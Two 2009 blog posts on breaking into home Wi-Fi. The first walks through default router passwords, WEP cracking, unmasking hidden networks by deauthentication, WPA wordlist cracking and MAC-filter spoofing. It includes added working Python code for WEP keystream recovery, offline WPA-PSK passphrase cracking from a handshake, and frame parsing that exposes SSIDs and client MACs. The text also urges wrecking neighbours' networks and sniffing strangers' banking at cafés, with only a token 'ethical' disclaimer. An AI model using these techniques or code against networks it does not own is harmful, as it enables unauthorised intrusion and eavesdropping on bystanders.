Jan 08 2009

Your home wireless network is not safe.


some of the attacks are shown here

Sorry, it’s just not. Mine isn’t either. There’s really no way around it. This article will describe several popular router configurations and how to break through them.


1) Out-of-the-box.

For instance, consider a family using a Linksys router to share their high-speed connection with their laptops, etc. Most likely the admin page is at 192.168.1.1 with user “admin” and password “admin”, and with that alone you could wreak all sorts of nasty havoc on their network or lock them out entirely. Not good. Never use the defaults: change the admin password, and while you’re in there make sure the admin page isn’t reachable from the wireless or WAN side. This isn’t just Linksys routers either. It’s very simple to determine what type of router you are seeing (the vendor prefix of its MAC address or the branding on the login page gives it away), and then you can easily Google the default passwords to log into it. Vonage, Verizon, D-Link users: I’m looking at you.

2) WEP Protection

Supposedly WEP is “good enough”. Well, maybe… it’s a deterrent, I suppose. These are very, very common password-protected networks; the Geek Squad will set it up for you, that sort of thing. The trouble is that WEP glues a 24-bit IV, sent in the clear, onto a static key to seed RC4, and certain IVs leak key bytes through RC4’s key scheduling. So the key isn’t guessed, it’s computed from enough captured traffic. Here’s how to break in with KisMac…

  • First, if the network is hidden, see #3 first.
  • Ok, now follow the screenshot: start capturing on the network’s channel. You’ll need a lot of unique IVs (over 100k for the weak-scheduling attack, which takes 5-10 minutes to capture on a busy network and much longer on an idle one). You can speed this up several ways. An authentication flood keeps the access point busy, but the thing that actually makes it produce fresh IVs is packet reinjection (that menu item), which replays captured traffic so the router answers with newly encrypted frames.
  • Keep an eye on the unique IVs, and whenever you feel “lucky” you can try one of the attacks; weak scheduling vs. a 40-bit key has worked for me in the past. I mean… for testing purposes, of course ;)
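
To make concrete why the IV count matters, here is an added example in Python (mine, not code from this post or from KisMac) with RC4 and the WEP framing; the key, IV and frame contents are made up. It does not implement the weak-scheduling attack itself. It shows the two facts that attack, and the simpler IV-reuse attack, rest on: the IV goes out in the clear and is keyed into RC4 together with the static key, and the first plaintext bytes of every data frame are known in advance.

```python
# Added example, not from the original post or from KisMac: RC4 and the WEP
# framing in a few lines, used to show why attackers count IVs. The key, IV
# and frame contents below are made up for the demo.


def rc4(key, length):
    """RC4 keystream of `length` bytes: key scheduling (KSA) then output (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key, iv, plaintext):
    """WEP body: the 3-byte IV travels in the clear, then plaintext XOR RC4(IV || key).
    The CRC-32 ICV is left out; it changes nothing about the weakness shown here."""
    return iv + xor(plaintext, rc4(iv + wep_key, len(plaintext)))


# Every data frame starts with an LLC/SNAP header, so its first plaintext bytes
# are known before you see it (this one announces an IP payload, ethertype 0x0800).
SNAP_IP = bytes.fromhex("aaaa030000000800")


def first_keystream_byte(captured):
    """Known plaintext 0xAA gives keystream byte 0 for this IV. That byte, collected
    over many weak IVs, is the input to the "weak scheduling" (FMS/KoreK) key recovery."""
    return captured[3] ^ SNAP_IP[0]


def recover_keystream(captured, known_plaintext):
    """Returns (iv, keystream) for as many bytes as the plaintext is known."""
    return captured[:3], xor(captured[3:], known_plaintext)


def decrypt_with_keystream(captured, keystream):
    return xor(captured[3:], keystream)


KEY = bytes.fromhex("0123456789")        # 40-bit WEP key (constructed)
IV = bytes.fromhex("0c0f2a")             # one of only 2**24 possible IVs
# With 2**24 IVs, a busy network cycles through them in hours and a birthday
# collision is likely after a few thousand frames, so IV reuse is routine.
PT1 = SNAP_IP + b"ARP request the attacker provoked, so its text is known"
PT2 = SNAP_IP + b"GET /login?user=alice&pw=hunter2"
FRAME1 = wep_encrypt(KEY, IV, PT1)
FRAME2 = wep_encrypt(KEY, IV, PT2)       # same IV reused: same keystream


def demo():
    # Known plaintext for FRAME1 yields the whole keystream for this IV...
    iv, ks = recover_keystream(FRAME1, PT1)
    # ...which decrypts FRAME2 outright; the WEP key is never touched.
    return iv, decrypt_with_keystream(FRAME2, ks)


if __name__ == "__main__":
    print(demo())
```

The same idea is what packet reinjection exploits: replaying a frame whose plaintext you know (an ARP request is the classic) makes the router mint keystream under IV after IV, and each first byte feeds the key-recovery statistics.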

3) Hidden ESSID

This is a “hidden” network: the router leaves the name out of its beacons, so typically you don’t see the network’s name come up on your computer as an available network. BestBuy in Seekonk, MA hides their “BestBuy” network this way. Quite simple to just type in and connect. But you, of course, have to know the ID to even get there. Now, BestBuy was easy to guess. But what if it were something a bit more random, like B3stBu7? We might not guess that.

Breaking in: If you can guess the name, that’s all you need. Otherwise, keep in mind that hiding only removes the name from the beacon; every client still sends it in the clear when it probes for or associates with the network, so the trick is to make a client do that while you listen. First, set your program to sniff on the channel you found the hidden ESSID on. Next, perform a deauthentication. This is built into KisMac (Deauthenticate, under the Network menu) and extremely easy to use. What this does is basically fool the clients: your computer pretends to be the router and sends deauthentication frames, which 802.11 never authenticates, so every client on the network drops off and has to reauthenticate and reassociate. In the confusion, their association requests carry the name of the network, and KisMac shows it to you. That gets you past the hiding; if the network also runs WEP or WPA, #2 or #4 still applies. You can see an example of a hidden network in my screenshot.

4) WPA

Well, now things are getting tricky. Locking down your wireless with WPA means both parties in the connection perform a four-way handshake before they talk: each side proves it knows the passphrase without ever sending it, and if either side’s proof doesn’t check out, it’s no go. This is why people choose this protection. But with a weak passphrase it can be broken, with time.

KisMac features several means under the Crack menu. Most involve throwing tons of words (“a wordlist”) at it. Just choose it from the menu. What KisMac actually needs from the air is one complete handshake between the router and a client; it grabs that as you capture packets listening in on the network (deauthenticating a client forces a fresh one), and then every word in the list is run through the same key derivation and checked against the handshake’s integrity check, offline. So this is a time-consuming, trial-and-error sort of thing: each guess costs thousands of hash operations, and it only works if the passphrase is in your list. Maybe 20-30 minutes or more of this will get you there… eventually, if the owner picked a dictionary word. A long random passphrase will not fall this way at all.
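
Here is what the wordlist attack is actually doing, as an added Python example (mine, not the post’s or KisMac’s code): the WPA-PSK key derivation from IEEE 802.11i, a constructed message 2 of the four-way handshake, and a loop testing candidates against its MIC. The SSID, addresses, nonces, passphrase and wordlist are all made up; the frame layout is the standard EAPOL-Key one.

```python
import hashlib
import hmac

# Added example, not KisMac's code: a miniature WPA/WPA2-PSK dictionary attack
# against a constructed 4-way handshake. All values below are made up.
#
# Key hierarchy (IEEE 802.11i):
#   PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
#   PTK = PRF-512(PMK, "Pairwise key expansion",
#                 min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
#   KCK = PTK[0:16], the key that MICs handshake messages 2..4
MIC_OFFSET = 81  # EAPOL hdr(4) + desc(1) + info(2) + len(2) + replay(8) + nonce(32) + iv(16) + rsc(8) + id(8)


def pmk_from_passphrase(passphrase, ssid):
    # 4096 iterations per guess is what makes this slow and wordlists necessary;
    # the SSID is the salt, so a precomputed table only works for one network name.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk, aa, spa, anonce, snonce):
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes covers the 64-byte TKIP PTK (CCMP uses the first 48)
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_frame, descriptor_version):
    # MIC is computed with the MIC field zeroed; version 1 (WPA/TKIP) uses HMAC-MD5,
    # version 2 (WPA2/CCMP) uses HMAC-SHA1, both truncated to 16 bytes.
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    digest = hashlib.md5 if descriptor_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def build_eapol_msg2(snonce, mic=b"\x00" * 16):
    # Minimal EAPOL-Key frame (no key data) shaped like message 2 of the handshake
    body = (b"\x02"                   # descriptor type: RSN
            + b"\x01\x0a"             # key info: version 2 (CCMP), pairwise, MIC bit set
            + b"\x00\x10"             # key length
            + b"\x00" * 7 + b"\x01"   # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, key ID
            + mic + b"\x00\x00")      # MIC, key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def crack_psk(ssid, aa, spa, anonce, snonce, captured_msg2, descriptor_version, wordlist):
    """Return the passphrase from `wordlist` that reproduces the captured MIC, or None."""
    captured_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = prf_512(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, captured_msg2, descriptor_version), captured_mic):
            return candidate
    return None


# --- constructed "capture": what a deauth-then-sniff hands you --------------------
SSID = "linksys"
AA = bytes.fromhex("001122334455")       # AP BSSID (made up)
SPA = bytes.fromhex("66778899aabb")      # client MAC (made up)
ANONCE = bytes(range(32))                # nonces come from messages 1 and 2
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "correct horse"        # what the victim actually set


def make_capture(passphrase):
    kck = prf_512(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE), 2))


CAPTURED_MSG2 = make_capture(REAL_PASSPHRASE)
WORDLIST = ["password", "admin", "linksys", "correct horse", "letmein"]

if __name__ == "__main__":
    print(crack_psk(SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2, 2, WORDLIST))
```

Note that nothing in the loop touches the network: once message 2 and both nonces are on disk, the attack is purely offline, which is why the only defense is a passphrase that is not in any wordlist.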

5) MAC filters

I used to advise people that this was a good means of protection. I did so under the philosophy that nothing is 100% safe, and a MAC filter is a great deterrent. Basically a MAC filter means that the router only allows connections from computers that it knows. Every network device has a MAC address, a unique identifier burned into the hardware, so the router really only talks to computers that you physically know about. Well… sort of. The catch is that the MAC address rides in the header of every frame, outside the encrypted part, so anyone listening can read it, and the card will happily send whatever address the operating system tells it to.

To crack it you basically need to just pretend to be one of those computers it will let in. Which ones will it allow? That’s easy: any computer that’s currently on the network. So using any sort of network profiling tool (I’ll use KisMac again as an example, but certainly others would work too), view the clients on the network and use one of their MAC addresses. Pick one that has just gone quiet if you can; two machines sharing one address on the same network step on each other.

How do you do that? This is called MAC spoofing, where essentially you pretend to have a different MAC address. There are a bunch of ways to do this. Here are a few ideas; none is guaranteed to work, but they have in the past in some form or another…

  • Using Linux or Mac OS X, you can check out what your MAC address is in your config files. This has worked on an older Red Hat distro, where these config files were saved some place like /etc/network-scripts … something like that; you’ll have to Google it.
  • Here’s a fun way to do it: use virtualization! Grab VirtualBox or something like that (maybe VMware Fusion, haven’t tried though). Inside your virtual machine’s settings there’s yet another glorious configuration file with… you guessed it… the MAC address, which you can freely change (to one that’s on the network, in our scenario).
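
One added example in Python (mine, not from this post or from KisMac) covers both #3 and #5: a minimal 802.11 header parser run over a constructed capture. It pulls the SSID out of an association request after the beacon advertised an empty one, and lists client MACs from data frames whose payload is encrypted. Addresses, SSID and payload bytes are made up; the frame layouts are the standard 802.11 ones.

```python
# Added example, not from the original post or from KisMac: a minimal 802.11
# header parser over constructed frames. Addresses, SSID and payloads are made
# up; the field layouts are the standard IEEE 802.11 ones.

TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_ASSOC_REQ, SUBTYPE_PROBE_REQ, SUBTYPE_PROBE_RESP, SUBTYPE_BEACON = 0, 4, 5, 8
FLAG_TO_DS, FLAG_FROM_DS, FLAG_PROTECTED = 0x01, 0x02, 0x40
TAG_SSID = 0
# bytes of fixed fields between the 24-byte MAC header and the first tagged parameter
FIXED_FIELDS = {SUBTYPE_BEACON: 12, SUBTYPE_PROBE_RESP: 12, SUBTYPE_PROBE_REQ: 0, SUBTYPE_ASSOC_REQ: 4}


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def tagged_params(body):
    """Yield (tag, value) pairs from a management frame body."""
    i = 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        yield tag, body[i + 2:i + 2 + length]
        i += 2 + length


def parse_frame(frame):
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if ftype == TYPE_MGMT:
        # management frames are sent in the clear (pre-802.11w); addr3 is the BSSID
        ssid = None
        if subtype in FIXED_FIELDS:
            for tag, val in tagged_params(frame[24 + FIXED_FIELDS[subtype]:]):
                if tag == TAG_SSID:
                    ssid = val.decode("ascii", "replace")
                    break
        return {"kind": "mgmt", "subtype": subtype, "bssid": mac_str(a3), "src": mac_str(a2), "ssid": ssid}
    if ftype == TYPE_DATA:
        # the header, addresses included, sits outside the WEP/WPA-encrypted payload
        if fc1 & FLAG_TO_DS and not fc1 & FLAG_FROM_DS:
            bssid, client = a1, a2
        elif fc1 & FLAG_FROM_DS and not fc1 & FLAG_TO_DS:
            bssid, client = a2, a1
        else:
            bssid, client = a3, a2  # ad-hoc / WDS; good enough for a survey
        return {"kind": "data", "bssid": mac_str(bssid), "client": mac_str(client),
                "protected": bool(fc1 & FLAG_PROTECTED)}
    return {"kind": "other"}


def survey(frames):
    """Per BSSID: whether it hides its SSID, the SSID seen anywhere, and the clients seen."""
    nets = {}
    for f in frames:
        p = parse_frame(f)
        if p["kind"] == "other":
            continue
        net = nets.setdefault(p["bssid"], {"ssid": None, "hidden": False, "clients": set()})
        if p["kind"] == "mgmt":
            if p["subtype"] == SUBTYPE_BEACON and p["ssid"] == "":
                net["hidden"] = True       # zero-length SSID in the beacon: "hidden" network
            elif p["ssid"]:
                net["ssid"] = p["ssid"]    # probe/association frames still carry it in the clear
        else:
            net["clients"].add(p["client"])  # what a MAC filter would let through
    return nets


# --- frame builders for the constructed capture ----------------------------------
def mgmt(subtype, src, dst, bssid, fixed, tags):
    hdr = bytes([subtype << 4, 0]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00"
    return hdr + fixed + b"".join(bytes([t, len(v)]) + v for t, v in tags)


def data(client, bssid, to_ds=True):
    flags = (FLAG_TO_DS if to_ds else FLAG_FROM_DS) | FLAG_PROTECTED
    a1, a2 = (bssid, client) if to_ds else (client, bssid)
    return bytes([0x08, flags]) + b"\x00\x00" + a1 + a2 + b"\x00" * 6 + b"\x00\x00" + b"\xde\xad" * 8


AP = bytes.fromhex("001122334455")
BCAST = b"\xff" * 6
CLIENT_A, CLIENT_B = bytes.fromhex("66778899aabb"), bytes.fromhex("ccddeeff0011")
CAPTURE = [
    mgmt(SUBTYPE_BEACON, AP, BCAST, AP, b"\x00" * 12, [(TAG_SSID, b"")]),        # beacon with empty SSID
    data(CLIENT_A, AP), data(CLIENT_B, AP), data(CLIENT_A, AP, to_ds=False),     # encrypted data, MACs visible
    mgmt(SUBTYPE_ASSOC_REQ, CLIENT_B, AP, AP, b"\x00" * 4, [(TAG_SSID, b"B3stBu7")]),  # client rejoining after a deauth
]

if __name__ == "__main__":
    print(survey(CAPTURE))
```

The same functions apply to real frames from a monitor-mode capture once the radiotap header is stripped; a deauthentication just makes the association request in the last frame happen on your schedule instead of the client’s.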

Other considerations

  • This stuff is pretty serious; I’m relaying it for ethical purposes. Don’t go be a douche and cause trouble.
  • Working in a virtual environment is good; that way it’s not your computer if things get nasty. Try it out, though: see if your virtual MAC address appears on your router. It’s quite possible you’ll only see your computer’s, because by default many virtualization environments put the VM on a private NAT subnet behind your computer, which then presents its own MAC to the router. Switch the VM’s network adapter to bridged mode and the spoofed address is what goes out on the air.

Be safe and ethical! Happy hacking!

Written by brian in: Advanced

Jan 08 2009

war driving

Ah yes, the fine art of war driving. To define war driving, think: a bunch of Linux geeks in a van stealing your neighbor’s wifi.

All you need is a laptop with wifi - and mobility!

Some tools:

kismet - in Linux, this is the way to go. Ubuntu users should be able to type “sudo apt-get install kismet” and the magic will happen. You will need to manually edit the kismet configuration file to tell it which wireless interface and driver to use. This program also supports GPS, so you can map where signal is available. It is a passive sniffer, so you can also read packets: if you’re sitting in a Panera with this puppy running on the open wifi, you can watch all the foolish coffee sippers check their bank accounts and write emails (anything not wrapped in SSL goes by in the clear)… fun!

kismac - the Mac variety, and it’s even BETTER than kismet. Why? Well, for one, it’s easier. But it also supports cracking of secured networks.

wireshark - available for Win/Mac/Linux. It’s a general packet analyzer rather than a wireless scanner: it won’t find networks or crack anything on its own, but hand it a capture from kismet or KisMac and it will decode every packet for you.

have fun!

Written by brian in: Advanced